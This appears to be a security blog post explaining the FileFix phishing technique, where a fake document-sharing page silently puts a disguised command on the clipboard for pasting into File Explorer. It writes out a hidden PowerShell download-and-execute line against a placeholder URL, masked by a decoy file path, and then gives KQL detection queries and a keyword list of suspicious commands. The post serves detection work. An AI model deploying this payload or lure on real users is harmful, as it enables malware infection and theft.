ClickFix was bad enough, it became the second most common attack vector right after phishing. ClickFix tricked users with a deceptive webpage (often disguised as a CAPTCHA) that prompted them to copy and paste a string, open the Run dialog with WIN+R, and boom, hidden in front of what looked like a harmless path was a whole PowerShell payload. This led to a surge in infostealers, cryptominers, and RATs.

It was only a matter of time before similar techniques popped up. Inspired by a blog from Mr.Dox, a new variant has emerged: FileFix.

This prompted me to demo the technique and try writing some KQL detections for it. Honestly? It’s pretty simple to detect. But let’s take a look at what FileFix is, and check out a (totally vibe-coded) demo.

What is FileFix?

Like I said, FileFix is basically an evolution of ClickFix. While ClickFix focused on abusing the WIN+R Run dialog, FileFix uses File Explorer instead. The idea is the same: trick the user into pasting a malicious payload somewhere Windows will execute it, but this time it’s into the File Explorer’s address bar.

Whether the attacker asks the user to open File Explorer manually or uses a fake upload function on a phishing site, once that payload is pasted and executed, the command runs often via PowerShell, MSHTA.exe, REGSVR32, or even BITSADMIN.

How Easy Is It to Set Up?

So... I wanted to see how easy it’d be to make a realistic-looking phishing site that uses FileFix. Some ChatGPT magic later, and within 30 minutes I had something fully working, and honestly? It looked pretty legit.

Here’s what the LindenSec Ultra Secure Document Sharing site looked like:

A bit of branding, a fake document name, some security blabla's, and we’re good. It tells the user to copy a path to their clipboard and paste it into File Explorer for access. Totally normal behavior, right?

Even better, there’s a button to open File Explorer automatically using a simple file:// link embedded in the page.

Where the Magic Happens

Here’s where it gets spicy: the clipboard is silently overwritten with a malicious PowerShell command. It looks innocent at first glance:

C:\LindenSec\filedrive\CompliancePolicy.docx

But scroll left in the address bar... and surprise!

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { $script = (New-Object System.Net.WebClient).DownloadString('https://a-payload-url'); Invoke-Expression $script }" # C:\LindenSec\SecureAccess\Documents\ComplianceAudit_Q4_2024.docx

So while the user thinks they're just opening a file, PowerShell is launched silently, and it pulls in an external script. In my test case, just a harmless dummy .ps1 so I could observe the behavior in Sentinel.

Hunting with KQL

Here’s the good news: this is super easy to detect.

PowerShell or mshta.exe being launched from a browser? That’s not normal behavior. Here’s a basic KQL query to hunt for FileFix-style abuse:

DeviceProcessEvents
| where Timestamp > ago(30d)
| where InitiatingProcessFileName in~ ("chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe")
| where FileName in~ ("powershell.exe", "pwsh.exe","regsvr32.exe","bitsadmin.exe","certutil.exe", "mshta.exe")
| project Timestamp,InitiatingProcessFileName,ProcessCommandLine, AccountName, DeviceName
| sort by Timestamp desc

This checks for suspicious binaries being launched from browser processes, behavior that should always be reviewed, legit or not.

Want to crank up the detection fidelity?

Add some classic FileFix/ClickFix keywords to catch malicious command lines:

| where ProcessCommandLine has_any ( "http", "https", "Invoke-", "mshta", "-eC", "Hidden", "iwr", "Invoke-WebRequest", "iex", "-Uri", "https", "-outfile", " -e ", " -en ", " -enc ", "Invoke-", ".msi", "Start-Process", "-replace", "Verification", "CAPTCHA", "robot", "curl" )

This will filter out most false positives while highlighting known indicators. If you’re using Microsoft XDR, suspicious PowerShell alerts should already help you zero in on this behavior quickly.

I hope you guys enjoyed my short vibecode experiment about this new technique, attached is the HTML code if you want to play around with it, just add a payload yourself and remember; EDUCATIONAL PURPOSES ONLY.

This shows ways to gain initial access are constantly evolving, and it doesn't have to be complicated..

Stay safe, if you have feedback or spot any errors, please let me know.